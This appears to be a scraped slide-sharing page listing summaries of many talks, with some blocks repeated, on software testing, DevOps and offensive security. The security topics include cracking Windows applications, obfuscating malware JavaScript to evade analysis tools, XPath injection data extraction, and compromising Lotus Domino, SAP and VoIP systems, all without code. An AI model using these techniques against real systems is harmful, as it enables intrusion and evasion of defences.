The document discusses investing in security to secure investments. It describes the work of penetration testers, including scanning systems, finding vulnerabilities, exploiting vulnerabilities, and escalating privileges. The goal is to identify the most dangerous vulnerabilities and show real attacks an attacker could perform.
Attacking IPv6 Implementation Using Fragmentationmichelemanzotti
This document provides an overview of attacking IPv6 implementations using fragmentation. It begins with background on fragmentation in IPv4 and IPv6. The presenter then examines fragmentation issues in popular OS implementations through examples. Target OSes include Ubuntu, FreeBSD, OpenBSD and Windows. Small fragments and overlapping fragments are demonstrated. The document discusses the security implications of these attacks, such as firewall evasion. It also covers different reassembly policies using the Paxson/Shankar model of fragmentation. The overall summary is that fragmentation can be used to bypass security controls by manipulating the packet payload across fragments.
Software testing is an investigation conducted to provide stakeholders with information about the quality of the product or service under test.
Software testing can also provide an objective, independent view of the software to allow the business to appreciate and understand the risks of software implementation.
Why is Software Testing Important to a business?
Software testing is a process to determine the quality of the software developed by a developer or programmer. It is a methodological study intended to evaluate the quality-related information of the product. Understanding of the important features and advantages of software testing helps businesses in their day-to-day activities.
Testing can be done in two ways, manual testing and automated testing. Manual software testing is done by human testers, who manually check the code and report bugs in it. In case of automated testing, testing is performed by a computer using software such as WinRunner, LoadRunner, etc.
This document discusses the importance of static analysis for secure programming. It describes how static analysis tools work by analyzing code without executing it to find security vulnerabilities based on predefined rules. Good tools prioritize results by risk and provide easy-to-understand interfaces for programmers to review issues. The document recommends adopting static analysis by running tools regularly during development, focusing on high priority issues, and measuring outcomes to improve security over time. Static analysis is presented as a way to bring security expertise to all programmers and make code reviews more efficient.
Software testing is an investigation conducted to provide stakeholders with information about the quality of the product or service under test.
Software testing can also provide an objective, independent view of the software to allow the business to appreciate and understand the risks of software implementation.
Why is Software Testing Important to a business?
Software testing is a process to determine the quality of the software developed by a developer or programmer. It is a methodological study intended to evaluate the quality-related information of the product. Understanding of the important features and advantages of software testing helps businesses in their day-to-day activities.
Testing can be done in two ways, manual testing and automated testing. Manual software testing is done by human testers, who manually check the code and report bugs in it. In case of automated testing, testing is performed by a computer using software such as WinRunner, LoadRunner, etc.
This document provides an introduction to reverse engineering and discusses cracking Windows applications. It begins with a disclaimer that reverse engineering copyrighted material is illegal. It then defines reverse engineering as analyzing a system to understand its structure and function in order to modify or reimplement parts of it. The document discusses reasons for learning reverse engineering like malware analysis, bug fixing, and customizations. It outlines some of the history of reverse engineering in software development. The remainder of the document focuses on tools and techniques for reverse engineering like PE identification, decompilers, disassemblers, debuggers, patching applications in OllyDbg, and analyzing key generation and phishing techniques.
S4 is a distributed stream computing platform that allows programmers to easily implement applications for processing continuous unbounded streams of data in real-time. It uses an actor-based programming model and is designed to be fault-tolerant, scalable, and pluggable. S4 was originally developed at Yahoo! Labs to enable personalized search ads by modeling users' click behaviors in real-time from streams of user activity data. It aims to maximize revenue and user experience by controlling ad ranking, pricing, filtering, and placement based on personalized models of users' intent.
Dr. Ronen Bar-Nahor - Optimizing Agile Testing in Complex EnvironmentsAgileSparks
The document discusses challenges in testing complex systems with legacy code and minimal automation. It recommends optimizing testing in agile by:
1) Breaking stories into testable chunks that can flow quickly to testing within sprints.
2) Involving QA early in architecture design to ensure testability.
3) Taking an incremental approach to automating tests for new features while refactoring legacy code.
4) Integrating continuously using a staged approach with independent integration testing.
Attacking IPv6 Implementation Using Fragmentationmichelemanzotti
This document provides an overview of attacking IPv6 implementations using fragmentation. It begins with background on fragmentation in IPv4 and IPv6. The presenter then examines fragmentation issues in popular OS implementations through examples. Target OSes include Ubuntu, FreeBSD, OpenBSD and Windows. Small fragments and overlapping fragments are demonstrated. The document discusses the security implications of these attacks, such as firewall evasion. It also covers different reassembly policies using the Paxson/Shankar model of fragmentation. The overall summary is that fragmentation can be used to bypass security controls by manipulating the packet payload across fragments.
Software testing is an investigation conducted to provide stakeholders with information about the quality of the product or service under test.
Software testing can also provide an objective, independent view of the software to allow the business to appreciate and understand the risks of software implementation.
Why is Software Testing Important to a business?
Software testing is a process to determine the quality of the software developed by a developer or programmer. It is a methodological study intended to evaluate the quality-related information of the product. Understanding of the important features and advantages of software testing helps businesses in their day-to-day activities.
Testing can be done in two ways, manual testing and automated testing. Manual software testing is done by human testers, who manually check the code and report bugs in it. In case of automated testing, testing is performed by a computer using software such as WinRunner, LoadRunner, etc.
This document discusses the importance of static analysis for secure programming. It describes how static analysis tools work by analyzing code without executing it to find security vulnerabilities based on predefined rules. Good tools prioritize results by risk and provide easy-to-understand interfaces for programmers to review issues. The document recommends adopting static analysis by running tools regularly during development, focusing on high priority issues, and measuring outcomes to improve security over time. Static analysis is presented as a way to bring security expertise to all programmers and make code reviews more efficient.
Software testing is an investigation conducted to provide stakeholders with information about the quality of the product or service under test.
Software testing can also provide an objective, independent view of the software to allow the business to appreciate and understand the risks of software implementation.
Why is Software Testing Important to a business?
Software testing is a process to determine the quality of the software developed by a developer or programmer. It is a methodological study intended to evaluate the quality-related information of the product. Understanding of the important features and advantages of software testing helps businesses in their day-to-day activities.
Testing can be done in two ways, manual testing and automated testing. Manual software testing is done by human testers, who manually check the code and report bugs in it. In case of automated testing, testing is performed by a computer using software such as WinRunner, LoadRunner, etc.
This document provides an introduction to reverse engineering and discusses cracking Windows applications. It begins with a disclaimer that reverse engineering copyrighted material is illegal. It then defines reverse engineering as analyzing a system to understand its structure and function in order to modify or reimplement parts of it. The document discusses reasons for learning reverse engineering like malware analysis, bug fixing, and customizations. It outlines some of the history of reverse engineering in software development. The remainder of the document focuses on tools and techniques for reverse engineering like PE identification, decompilers, disassemblers, debuggers, patching applications in OllyDbg, and analyzing key generation and phishing techniques.
S4 is a distributed stream computing platform that allows programmers to easily implement applications for processing continuous unbounded streams of data in real-time. It uses an actor-based programming model and is designed to be fault-tolerant, scalable, and pluggable. S4 was originally developed at Yahoo! Labs to enable personalized search ads by modeling users' click behaviors in real-time from streams of user activity data. It aims to maximize revenue and user experience by controlling ad ranking, pricing, filtering, and placement based on personalized models of users' intent.
Dr. Ronen Bar-Nahor - Optimizing Agile Testing in Complex EnvironmentsAgileSparks
The document discusses challenges in testing complex systems with legacy code and minimal automation. It recommends optimizing testing in agile by:
1) Breaking stories into testable chunks that can flow quickly to testing within sprints.
2) Involving QA early in architecture design to ensure testability.
3) Taking an incremental approach to automating tests for new features while refactoring legacy code.
4) Integrating continuously using a staged approach with independent integration testing.
Agile Software Development with Intrinsic QualityDemetrius Nunes
This is a little presentation to make absolutely clear why test automation and test driven development are key to any software development process that strives for high quality and high productivity.
[2010 CodeEngn Conference 04] passket - Taint analysis for vulnerability disc...GangSeok Lee
2010 CodeEngn Conference 04
프로그램을 개발함에 있어서 취약점이란 언제나 존재하기 마련이다. 취약점을 찾거나 공략하는 일에 자신의 모든것을 투자하는 해커들에게 있어서, 프로그램 안에 취약점은 반드시 어딘가 “숨어”있는 것이다. 이런 숨어있는 취약점들을 찾기 위해 많은 해커들이 자신만의 노하우를 가지고 있다. 이 발표에서는 이런 수 많은 노하우들 중에 Taint Analysis를 통해 입력된 데이타들이 어떤 경로를 가지고 프로그램내에서 변조되는지에 대한 분석기법을 이야기한다. 기존의 Mutation 이나 Diffing 기반의 단순한 취약점 진단 기법들을 지나서 입력 데이터의 Life Cycle과 변조된 입력 데이터가 어떻게 프로그램의 영향을 미쳐 취약점을 유도하는지, 혹은 변조된 데이터를 기반으로 알려지지 않은 Zeroday 공격들을 탐지할 수 있는 기법들을 설명한다. 또한, Taint Analysis를 통해 효율적인 Fuzzer를 구성하는 방법에 대해 설명한다.
http://codeengn.com/conference/04
This document discusses managing failures and building resilience into systems at Etsy. Some key points:
1. Etsy has a complex architecture with many services and data stores that are functionally partitioned. This architecture is designed to limit the impact of failures.
2. Failures cannot be prevented, but they can be mitigated through techniques like redundant systems, small code changes, feature flags, extensive metrics collection, and resilient user interfaces.
3. Rather than focusing only on 100% uptime, product design also considers availability during failures through approaches like non-blocking interfaces that adapt to technical issues.
4. Building resilience is a shared responsibility of operations, engineering, product, and design teams through
Creating, obfuscating and analyzing malware JavaScriptKrzysztof Kotowicz
Malware attacks on unaware Internet users' browsers are becoming more and more common. New techniques for bypassing filters used by security vendors emerge. In turn, the filters are getting better, new analyzing tools are developed - the war continues. At the presentation you will learn how crackers are trying to hamper the work of security engineers, and how reversers are overcoming those problems. Emphasis will be placed on the weaknesses of automated tools - we'll try to avoid detection by jsunpack and Capture-HPC, we'll also trick Dean Edwards' Unpacker.
Here are 3 ways to prevent SQL injection:
1. Use prepared statements with parameter binding instead of concatenating strings.
2. Validate all input and sanitize special characters.
3. White-list allowed characters instead of blacklisting dangerous ones.
The root cause is putting untrusted data directly into a SQL query. Always separate data and code to prevent injection attacks.
Reading Group Presentation: The Power of ProcrastinationMichael Rushanan
This presentation exposes the current threat model of execution stalling malicious code, and multiple pointers to relevant academic research in analysis. I presented these works to a weekly Security and Privacy reading group.
The academic proceeding can be found here:
www.syssec-project.eu/media/page-media/3/hasten-ccs11.pdf
Michael Wilde, Splunk Ninja, gives an overview of Splunk, and discusses ways in which Splunk has solved some of its challenges using Amazon\'s EC2 / S3 Web Service to accomplish business goals
David Nuescheler: Igniting CQ 5.3: What's New and RoadmapDay Software
This document provides a roadmap and overview of CQ 5.3. It discusses improvements and new features in CQ 5.3 including easier use, more robustness, and 500 fixes and enhancements. It outlines stakeholder groups and introduces new tools like CRXDE Lite and the Package Share system. The document discusses future plans including investments in technologies like the cloud, JCR 2.0, and releases of CQ 5.4 and 5.5. It emphasizes that agility matters for business, authors, developers and infrastructure.
Kris Buytaert gave a talk on open source monitoring tools. He discussed how monitoring used to be an afterthought but new tools now focus on automation and integration. Popular modern tools like Prometheus focus on metrics collection and short-term storage while shipping long-term data to systems like Graphite. Prometheus excels at containerized environments through scraping but can also monitor other systems. Visualization and alerting have many options like Grafana, Icinga, and AlertManager. The landscape continues evolving towards full observability of applications and services.
Pipeline as code for your infrastructure as CodeKris Buytaert
This document discusses infrastructure as code (IAC) and continuous delivery pipelines. It introduces Puppet as an open-source configuration management tool for defining infrastructure as code. It emphasizes treating infrastructure configuration like code by versioning it, testing it, and promoting changes through environments like development, test, and production. The document also discusses using Jenkins for continuous integration to test application and infrastructure code changes and building automated pipelines for packaging and deploying changes.
Data Driven Security, from Gartner Security Summit 2012Nick Galbreath
This document summarizes a presentation by Nick Galbreath on how Etsy uses Splunk to enable data-driven security. Some key points:
- Etsy uses Splunk to detect web application attacks like SQL injection and cross-site scripting by monitoring logs for malicious patterns.
- Splunk helps Etsy identify potential account takeovers from anomalous login activity like many failed passwords from one IP or high-volume password reset requests.
- Payment data in Splunk allows Etsy to monitor for fraud risks like abnormal payment amounts or velocities.
- Splunk supports Etsy's PCI compliance by enabling log searches and customized reports on sensitive systems.
This document discusses the concept of symbiotic security, where multiple security tools work together in an integrated ecosystem. It provides an example of how ThreadFix acts as a symbiotic tool by consolidating vulnerability data from different scanners and allowing that data to be used by other tools. The document argues that security tools should provide open APIs and data standards to encourage symbiotic functionality rather than working in isolated "silos". It also demonstrates how ThreadFix allows vulnerability data to be mapped with operational data and prioritized based on actual attacks.
ePOM - Fundamentals of Research Software Development - Integrated Development...Giuseppe Masetti
E-learning Python for Ocean Mapping (ePOM) project.
Complementary slides to the "Integrated Development Environment" module (part of the Fundamentals of Research Software Development training).
More details at https://www.hydroffice.org/epom
Operations is a Strategic Weapon (PuppetConf)dev2ops
Operations is a strategic weapon when companies continuously increase their velocity of innovation and improve their return on investment. When deployments can happen every few seconds and outages are rare, operations becomes a strategic advantage by allowing companies to scale, innovate quicker, and lower costs. This allows companies to win "innovation numbers games" against competitors.
NOSEC JSky is another product produced by NOSEC who build Pangolin. It helps you test for the latest vulnerabilities in current Web technologies so that you can find security problems in your applications before the hackers do.NOSEC JSky is a website security testing tool that automates vulnerability assessments. Support all Web application technologies – including ASP, ASP, NET,Java, PHP, JavaScript, Flash, Ajax. Jsky is a fast scanner which covers all Web application vulnerabilities including SQL-Injection and Cross-Site Scripting, WASC TC 2, OWASP TOP 10 compliance. JSky lack the intelligence required to scan the complexities of today's interactive Web 2.0 applications.
[CB19] Spyware, Ransomware and Worms. How to prevent the next SAP tragedy by ...CODE BLUE
On this presentation, we will raise awareness on how the SAP Internet facing systems are particularly vulnerable to Spyware, Ransomware and Worms due to their inherent complexity.
We will also introduce (for the first time in Asia ) the “Project ARSAP”. This project is a semi-automatic mechanism which main goal is to detect and register all the SAP systems that are exposed to the Internet, extracting the system’s metadata and cataloging the assets in base of their Geo-location, system type, version, installed components and potential risk of compromise.
We will present a brief introduction to SAP, defining its architecture / entry points and explain with great detail the methodology behind the “ARSAP” project.
Then, three different scenarios were malware could strike SAP will be showcased. We will start by recreating a real SAP cyber-attack, where a company got attacked via malicious emails and we will move forward to some other complex techniques that could allow anyone, directly from the Internet to compromise the whole Interfacing SAP system and jump to the adjacent network.
This presentation will have several live demos where the attendees will be able to observe the entire attack workflow. We will conclude the presentation by presenting some suggested remediations and conclusions.
This document discusses threats to Android applications and existing techniques for protecting apps. It describes how apps can easily be cloned or modified by decompiling the APK, changing code or resources, and resigning it with a new signature. Standard techniques like obfuscation and licensing are ineffective against automated cracking tools. Strong integrity protection requires additional active measures beyond what is currently used.
The document provides a roadmap for CQ 5.3, highlighting key features and investments. It summarizes enhancements in usability, performance, and development tools. It also outlines the product release plan, with milestones for JCR, CMIS, HTTPbis, and future versions of CQ and CRX. The cloud is positioned as an agile alternative to on-premise hardware.
1) The document discusses XPath, an XML query language used to select nodes from an XML document. It provides examples of how XPath can be used to query nodes based on attributes, children, and other properties.
2) The document then discusses how XPath injection could allow an attacker to bypass authentication, bypass business logic, or extract arbitrary data from an XML database if user input is not sanitized in XPath queries.
3) Useful XPath functions like count, name, substring are demonstrated that could help an attacker crawl through and extract information from an XML structure. True/false-based blind XPath injection techniques are also presented.
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...michelemanzotti
This document summarizes three case studies of security assessments performed on VoIP environments. In Case Study 1, major weaknesses were identified in encryption and entity protection. Case Study 2 had weaknesses in access control, isolation, restriction, entity protection and secure management. Case Study 3 also identified issues with entity protection and secure management. The document discusses technical details found in each environment such as exposed services, outdated software and default credentials.
More Related Content
Similar to Lotus Domino: Penetration Through the Controller
Agile Software Development with Intrinsic QualityDemetrius Nunes
This is a little presentation to make absolutely clear why test automation and test driven development are key to any software development process that strives for high quality and high productivity.
[2010 CodeEngn Conference 04] passket - Taint analysis for vulnerability disc...GangSeok Lee
2010 CodeEngn Conference 04
프로그램을 개발함에 있어서 취약점이란 언제나 존재하기 마련이다. 취약점을 찾거나 공략하는 일에 자신의 모든것을 투자하는 해커들에게 있어서, 프로그램 안에 취약점은 반드시 어딘가 “숨어”있는 것이다. 이런 숨어있는 취약점들을 찾기 위해 많은 해커들이 자신만의 노하우를 가지고 있다. 이 발표에서는 이런 수 많은 노하우들 중에 Taint Analysis를 통해 입력된 데이타들이 어떤 경로를 가지고 프로그램내에서 변조되는지에 대한 분석기법을 이야기한다. 기존의 Mutation 이나 Diffing 기반의 단순한 취약점 진단 기법들을 지나서 입력 데이터의 Life Cycle과 변조된 입력 데이터가 어떻게 프로그램의 영향을 미쳐 취약점을 유도하는지, 혹은 변조된 데이터를 기반으로 알려지지 않은 Zeroday 공격들을 탐지할 수 있는 기법들을 설명한다. 또한, Taint Analysis를 통해 효율적인 Fuzzer를 구성하는 방법에 대해 설명한다.
http://codeengn.com/conference/04
This document discusses managing failures and building resilience into systems at Etsy. Some key points:
1. Etsy has a complex architecture with many services and data stores that are functionally partitioned. This architecture is designed to limit the impact of failures.
2. Failures cannot be prevented, but they can be mitigated through techniques like redundant systems, small code changes, feature flags, extensive metrics collection, and resilient user interfaces.
3. Rather than focusing only on 100% uptime, product design also considers availability during failures through approaches like non-blocking interfaces that adapt to technical issues.
4. Building resilience is a shared responsibility of operations, engineering, product, and design teams through
Creating, obfuscating and analyzing malware JavaScriptKrzysztof Kotowicz
Malware attacks on unaware Internet users' browsers are becoming more and more common. New techniques for bypassing filters used by security vendors emerge. In turn, the filters are getting better, new analyzing tools are developed - the war continues. At the presentation you will learn how crackers are trying to hamper the work of security engineers, and how reversers are overcoming those problems. Emphasis will be placed on the weaknesses of automated tools - we'll try to avoid detection by jsunpack and Capture-HPC, we'll also trick Dean Edwards' Unpacker.
Here are 3 ways to prevent SQL injection:
1. Use prepared statements with parameter binding instead of concatenating strings.
2. Validate all input and sanitize special characters.
3. White-list allowed characters instead of blacklisting dangerous ones.
The root cause is putting untrusted data directly into a SQL query. Always separate data and code to prevent injection attacks.
Reading Group Presentation: The Power of ProcrastinationMichael Rushanan
This presentation exposes the current threat model of execution stalling malicious code, and multiple pointers to relevant academic research in analysis. I presented these works to a weekly Security and Privacy reading group.
The academic proceeding can be found here:
www.syssec-project.eu/media/page-media/3/hasten-ccs11.pdf
Michael Wilde, Splunk Ninja, gives an overview of Splunk, and discusses ways in which Splunk has solved some of its challenges using Amazon\'s EC2 / S3 Web Service to accomplish business goals
David Nuescheler: Igniting CQ 5.3: What's New and RoadmapDay Software
This document provides a roadmap and overview of CQ 5.3. It discusses improvements and new features in CQ 5.3 including easier use, more robustness, and 500 fixes and enhancements. It outlines stakeholder groups and introduces new tools like CRXDE Lite and the Package Share system. The document discusses future plans including investments in technologies like the cloud, JCR 2.0, and releases of CQ 5.4 and 5.5. It emphasizes that agility matters for business, authors, developers and infrastructure.
Kris Buytaert gave a talk on open source monitoring tools. He discussed how monitoring used to be an afterthought but new tools now focus on automation and integration. Popular modern tools like Prometheus focus on metrics collection and short-term storage while shipping long-term data to systems like Graphite. Prometheus excels at containerized environments through scraping but can also monitor other systems. Visualization and alerting have many options like Grafana, Icinga, and AlertManager. The landscape continues evolving towards full observability of applications and services.
Pipeline as code for your infrastructure as CodeKris Buytaert
This document discusses infrastructure as code (IAC) and continuous delivery pipelines. It introduces Puppet as an open-source configuration management tool for defining infrastructure as code. It emphasizes treating infrastructure configuration like code by versioning it, testing it, and promoting changes through environments like development, test, and production. The document also discusses using Jenkins for continuous integration to test application and infrastructure code changes and building automated pipelines for packaging and deploying changes.
Data Driven Security, from Gartner Security Summit 2012Nick Galbreath
This document summarizes a presentation by Nick Galbreath on how Etsy uses Splunk to enable data-driven security. Some key points:
- Etsy uses Splunk to detect web application attacks like SQL injection and cross-site scripting by monitoring logs for malicious patterns.
- Splunk helps Etsy identify potential account takeovers from anomalous login activity like many failed passwords from one IP or high-volume password reset requests.
- Payment data in Splunk allows Etsy to monitor for fraud risks like abnormal payment amounts or velocities.
- Splunk supports Etsy's PCI compliance by enabling log searches and customized reports on sensitive systems.
This document discusses the concept of symbiotic security, where multiple security tools work together in an integrated ecosystem. It provides an example of how ThreadFix acts as a symbiotic tool by consolidating vulnerability data from different scanners and allowing that data to be used by other tools. The document argues that security tools should provide open APIs and data standards to encourage symbiotic functionality rather than working in isolated "silos". It also demonstrates how ThreadFix allows vulnerability data to be mapped with operational data and prioritized based on actual attacks.
ePOM - Fundamentals of Research Software Development - Integrated Development...Giuseppe Masetti
E-learning Python for Ocean Mapping (ePOM) project.
Complementary slides to the "Integrated Development Environment" module (part of the Fundamentals of Research Software Development training).
More details at https://www.hydroffice.org/epom
Operations is a Strategic Weapon (PuppetConf)dev2ops
Operations is a strategic weapon when companies continuously increase their velocity of innovation and improve their return on investment. When deployments can happen every few seconds and outages are rare, operations becomes a strategic advantage by allowing companies to scale, innovate quicker, and lower costs. This allows companies to win "innovation numbers games" against competitors.
NOSEC JSky is another product produced by NOSEC who build Pangolin. It helps you test for the latest vulnerabilities in current Web technologies so that you can find security problems in your applications before the hackers do.NOSEC JSky is a website security testing tool that automates vulnerability assessments. Support all Web application technologies – including ASP, ASP, NET,Java, PHP, JavaScript, Flash, Ajax. Jsky is a fast scanner which covers all Web application vulnerabilities including SQL-Injection and Cross-Site Scripting, WASC TC 2, OWASP TOP 10 compliance. JSky lack the intelligence required to scan the complexities of today's interactive Web 2.0 applications.
[CB19] Spyware, Ransomware and Worms. How to prevent the next SAP tragedy by ...CODE BLUE
On this presentation, we will raise awareness on how the SAP Internet facing systems are particularly vulnerable to Spyware, Ransomware and Worms due to their inherent complexity.
We will also introduce (for the first time in Asia ) the “Project ARSAP”. This project is a semi-automatic mechanism which main goal is to detect and register all the SAP systems that are exposed to the Internet, extracting the system’s metadata and cataloging the assets in base of their Geo-location, system type, version, installed components and potential risk of compromise.
We will present a brief introduction to SAP, defining its architecture / entry points and explain with great detail the methodology behind the “ARSAP” project.
Then, three different scenarios were malware could strike SAP will be showcased. We will start by recreating a real SAP cyber-attack, where a company got attacked via malicious emails and we will move forward to some other complex techniques that could allow anyone, directly from the Internet to compromise the whole Interfacing SAP system and jump to the adjacent network.
This presentation will have several live demos where the attendees will be able to observe the entire attack workflow. We will conclude the presentation by presenting some suggested remediations and conclusions.
This document discusses threats to Android applications and existing techniques for protecting apps. It describes how apps can easily be cloned or modified by decompiling the APK, changing code or resources, and resigning it with a new signature. Standard techniques like obfuscation and licensing are ineffective against automated cracking tools. Strong integrity protection requires additional active measures beyond what is currently used.
The document provides a roadmap for CQ 5.3, highlighting key features and investments. It summarizes enhancements in usability, performance, and development tools. It also outlines the product release plan, with milestones for JCR, CMIS, HTTPbis, and future versions of CQ and CRX. The cloud is positioned as an agile alternative to on-premise hardware.
Similar to Lotus Domino: Penetration Through the Controller (20)
1) The document discusses XPath, an XML query language used to select nodes from an XML document. It provides examples of how XPath can be used to query nodes based on attributes, children, and other properties.
2) The document then discusses how XPath injection could allow an attacker to bypass authentication, bypass business logic, or extract arbitrary data from an XML database if user input is not sanitized in XPath queries.
3) Useful XPath functions like count, name, substring are demonstrated that could help an attacker crawl through and extract information from an XML structure. True/false-based blind XPath injection techniques are also presented.
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...michelemanzotti
This document summarizes three case studies of security assessments performed on VoIP environments. In Case Study 1, major weaknesses were identified in encryption and entity protection. Case Study 2 had weaknesses in access control, isolation, restriction, entity protection and secure management. Case Study 3 also identified issues with entity protection and secure management. The document discusses technical details found in each environment such as exposed services, outdated software and default credentials.
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
The document discusses security vulnerabilities found in the web interfaces of security gateways. The author details how they used automated scanners, manual testing with Burp, and SSH access to root to find over 35 exploits in various security gateway products since 2011. Common vulnerabilities included input validation issues, predictable URLs and parameters enabling CSRF, excessive privileges, and session management flaws. The author provides examples of compromising ClearOS and Websense gateways, and demonstrates OSRF through Proofpoint's email system. They conclude many techniques are older but there remains a knowledge gap between secure web and UI development.
The document discusses TrueType fonts (.TTF) and their structure. It explains that a TrueType font file contains glyph outline data and hinting information in various tables. These include the EBDT, EBLC and EBSC tables which store embedded bitmap data, locations and scaling information. It also describes the glyf table which contains glyph outline instructions and details important aspects like the graphics state and instruction set for exploitation purposes.
Lotus Domino: Penetration Through the Controllermichelemanzotti
The document discusses penetration testing the Lotus Domino Server Controller. It describes 6 stages of an attack: 1) Searching for a target, 2) Choosing an exploit, 3) Researching the console protocol, 4) Exploiting the ZDI-11-110 vulnerability, 5) Using an exploit on SMB, and 6) Exploiting a 0day vulnerability. The purpose is to demonstrate how an attacker could gain control of the Domino server and the underlying operating system through vulnerabilities in the controller. It focuses on exploits for Lotus Domino 8.5.2 and 8.5.3 on Windows.
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?michelemanzotti
This document discusses cyber attacks against SAP systems. It notes that while many organizations focus on segregation of duties controls for SAP security, the underlying business infrastructure is also vulnerable. The number of reported vulnerabilities in SAP systems has risen dramatically in recent years. The document outlines some of the external and internal threats facing SAP implementations, and reports that penetration tests conducted by the author's company routinely found major security issues in over 95% of SAP systems evaluated, leaving them exposed to espionage and sabotage attacks.
Have you ever been confused by the myriad of choices offered by AWS for hosting a website or an API?
Lambda, Elastic Beanstalk, Lightsail, Amplify, S3 (and more!) can each host websites + APIs. But which one should we choose?
Which one is cheapest? Which one is fastest? Which one will scale to meet our needs?
Join me in this session as we dive into each AWS hosting service to determine which one is best for your scenario and explain why!
In the realm of cybersecurity, offensive security practices act as a critical shield. By simulating real-world attacks in a controlled environment, these techniques expose vulnerabilities before malicious actors can exploit them. This proactive approach allows manufacturers to identify and fix weaknesses, significantly enhancing system security.
This presentation delves into the development of a system designed to mimic Galileo's Open Service signal using software-defined radio (SDR) technology. We'll begin with a foundational overview of both Global Navigation Satellite Systems (GNSS) and the intricacies of digital signal processing.
The presentation culminates in a live demonstration. We'll showcase the manipulation of Galileo's Open Service pilot signal, simulating an attack on various software and hardware systems. This practical demonstration serves to highlight the potential consequences of unaddressed vulnerabilities, emphasizing the importance of offensive security practices in safeguarding critical infrastructure.
For the full video of this presentation, please visit: https://www.edge-ai-vision.com/2024/06/how-axelera-ai-uses-digital-compute-in-memory-to-deliver-fast-and-energy-efficient-computer-vision-a-presentation-from-axelera-ai/
Bram Verhoef, Head of Machine Learning at Axelera AI, presents the “How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-efficient Computer Vision” tutorial at the May 2024 Embedded Vision Summit.
As artificial intelligence inference transitions from cloud environments to edge locations, computer vision applications achieve heightened responsiveness, reliability and privacy. This migration, however, introduces the challenge of operating within the stringent confines of resource constraints typical at the edge, including small form factors, low energy budgets and diminished memory and computational capacities. Axelera AI addresses these challenges through an innovative approach of performing digital computations within memory itself. This technique facilitates the realization of high-performance, energy-efficient and cost-effective computer vision capabilities at the thin and thick edge, extending the frontier of what is achievable with current technologies.
In this presentation, Verhoef unveils his company’s pioneering chip technology and demonstrates its capacity to deliver exceptional frames-per-second performance across a range of standard computer vision networks typical of applications in security, surveillance and the industrial sector. This shows that advanced computer vision can be accessible and efficient, even at the very edge of our technological ecosystem.
Discover top-tier mobile app development services, offering innovative solutions for iOS and Android. Enhance your business with custom, user-friendly mobile applications.
Fueling AI with Great Data with Airbyte WebinarZilliz
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfChart Kalyan
A Mix Chart displays historical data of numbers in a graphical or tabular form. The Kalyan Rajdhani Mix Chart specifically shows the results of a sequence of numbers over different periods.
Taking AI to the Next Level in Manufacturing.pdfssuserfac0301
Read Taking AI to the Next Level in Manufacturing to gain insights on AI adoption in the manufacturing industry, such as:
1. How quickly AI is being implemented in manufacturing.
2. Which barriers stand in the way of AI adoption.
3. How data quality and governance form the backbone of AI.
4. Organizational processes and structures that may inhibit effective AI adoption.
6. Ideas and approaches to help build your organization's AI strategy.
Main news related to the CCS TSI 2023 (2023/1695)Jakub Marek
An English 🇬🇧 translation of a presentation to the speech I gave about the main changes brought by CCS TSI 2023 at the biggest Czech conference on Communications and signalling systems on Railways, which was held in Clarion Hotel Olomouc from 7th to 9th November 2023 (konferenceszt.cz). Attended by around 500 participants and 200 on-line followers.
The original Czech 🇨🇿 version of the presentation can be found here: https://www.slideshare.net/slideshow/hlavni-novinky-souvisejici-s-ccs-tsi-2023-2023-1695/269688092 .
The videorecording (in Czech) from the presentation is available here: https://youtu.be/WzjJWm4IyPk?si=SImb06tuXGb30BEH .
What is an RPA CoE? Session 1 – CoE VisionDianaGray10
In the first session, we will review the organization's vision and how this has an impact on the COE Structure.
Topics covered:
• The role of a steering committee
• How do the organization’s priorities determine CoE Structure?
Speaker:
Chris Bolin, Senior Intelligent Automation Architect Anika Systems
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving
Manufacturing custom quality metal nameplates and badges involves several standard operations. Processes include sheet prep, lithography, screening, coating, punch press and inspection. All decoration is completed in the flat sheet with adhesive and tooling operations following. The possibilities for creating unique durable nameplates are endless. How will you create your brand identity? We can help!
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor IvaniukFwdays
At this talk we will discuss DDoS protection tools and best practices, discuss network architectures and what AWS has to offer. Also, we will look into one of the largest DDoS attacks on Ukrainian infrastructure that happened in February 2022. We'll see, what techniques helped to keep the web resources available for Ukrainians and how AWS improved DDoS protection for all customers based on Ukraine experience
Generating privacy-protected synthetic data using Secludy and MilvusZilliz
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
5th LF Energy Power Grid Model Meet-up SlidesDanBrown980551
5th Power Grid Model Meet-up
It is with great pleasure that we extend to you an invitation to the 5th Power Grid Model Meet-up, scheduled for 6th June 2024. This event will adopt a hybrid format, allowing participants to join us either through an online Mircosoft Teams session or in person at TU/e located at Den Dolech 2, Eindhoven, Netherlands. The meet-up will be hosted by Eindhoven University of Technology (TU/e), a research university specializing in engineering science & technology.
Power Grid Model
The global energy transition is placing new and unprecedented demands on Distribution System Operators (DSOs). Alongside upgrades to grid capacity, processes such as digitization, capacity optimization, and congestion management are becoming vital for delivering reliable services.
Power Grid Model is an open source project from Linux Foundation Energy and provides a calculation engine that is increasingly essential for DSOs. It offers a standards-based foundation enabling real-time power systems analysis, simulations of electrical power grids, and sophisticated what-if analysis. In addition, it enables in-depth studies and analysis of the electrical power grid’s behavior and performance. This comprehensive model incorporates essential factors such as power generation capacity, electrical losses, voltage levels, power flows, and system stability.
Power Grid Model is currently being applied in a wide variety of use cases, including grid planning, expansion, reliability, and congestion studies. It can also help in analyzing the impact of renewable energy integration, assessing the effects of disturbances or faults, and developing strategies for grid control and optimization.
What to expect
For the upcoming meetup we are organizing, we have an exciting lineup of activities planned:
-Insightful presentations covering two practical applications of the Power Grid Model.
